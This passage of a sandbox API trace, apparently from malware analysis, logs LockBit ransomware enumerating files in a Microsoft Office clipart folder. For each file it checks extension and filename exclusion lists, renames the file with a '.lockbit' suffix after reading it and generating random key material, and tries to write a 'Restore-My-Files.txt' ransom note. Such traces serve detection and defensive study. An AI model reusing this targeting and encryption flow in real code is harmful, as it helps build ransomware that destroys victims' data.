lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02009_.WMF") returned -1 [0176.561] lstrcmpiW (lpString1="ntldr", lpString2="SO02009_.WMF") returned -1 [0176.561] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02009_.WMF") returned -1 [0176.561] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02009_.WMF") returned -1 [0176.561] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02009_.WMF") returned -1 [0176.561] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02009_.WMF") returned 1 [0176.561] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02009_.WMF") returned -1 [0176.561] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.561] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF") returned=".WMF" [0176.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.562] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.562] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.562] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF.lockbit") returned 72 [0176.563] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02009_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0176.566] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.566] malloc (_Size=0x40068) returned 0x3d70450 [0176.566] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7444) returned 1 [0176.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0176.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0176.567] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0176.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.568] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.569] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.572] free (_Block=0x1fa2ed8) [0176.572] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.572] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.572] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02022_.WMF", cAlternateFileName="")) returned 1 [0176.572] lstrcmpiW (lpString1=".", lpString2="SO02022_.WMF") returned -1 [0176.572] lstrcmpiW (lpString1="..", lpString2="SO02022_.WMF") returned -1 [0176.572] PathFindExtensionW (pszPath="SO02022_.WMF") returned=".WMF" [0176.572] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.572] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.573] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.573] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02022_.WMF") returned -1 [0176.574] lstrcmpiW (lpString1="ntldr", lpString2="SO02022_.WMF") returned -1 [0176.574] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02022_.WMF") returned -1 [0176.574] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02022_.WMF") returned -1 [0176.574] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02022_.WMF") returned -1 [0176.574] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02022_.WMF") returned 1 [0176.574] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02022_.WMF") returned -1 [0176.574] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.574] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF") returned=".WMF" [0176.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.574] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.574] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.575] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.575] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF.lockbit") returned 72 [0176.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02022_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0176.576] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.576] malloc (_Size=0x40068) returned 0x3f70048 [0176.576] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=7528) returned 1 [0176.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0176.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0176.577] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0176.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.581] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.581] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.582] free (_Block=0x1fa2ed8) [0176.582] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x23a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02024_.WMF", cAlternateFileName="")) returned 1 [0176.582] lstrcmpiW (lpString1=".", lpString2="SO02024_.WMF") returned -1 [0176.582] lstrcmpiW (lpString1="..", lpString2="SO02024_.WMF") returned -1 [0176.582] PathFindExtensionW (pszPath="SO02024_.WMF") returned=".WMF" [0176.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.584] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02024_.WMF") returned -1 [0176.584] lstrcmpiW (lpString1="ntldr", lpString2="SO02024_.WMF") returned -1 [0176.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02024_.WMF") returned -1 [0176.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02024_.WMF") returned -1 [0176.584] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02024_.WMF") returned -1 [0176.584] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02024_.WMF") returned 1 [0176.585] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02024_.WMF") returned -1 [0176.585] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.585] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF") returned=".WMF" [0176.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.585] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.585] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.586] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.586] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.586] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.586] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.586] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.586] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF.lockbit") returned 72 [0176.586] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02024_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0176.587] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.587] malloc (_Size=0x40068) returned 0x3e70008 [0176.587] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9128) returned 1 [0176.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0176.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0176.588] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0176.592] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.592] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.592] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.593] free (_Block=0x1fa2ed8) [0176.593] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.593] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program 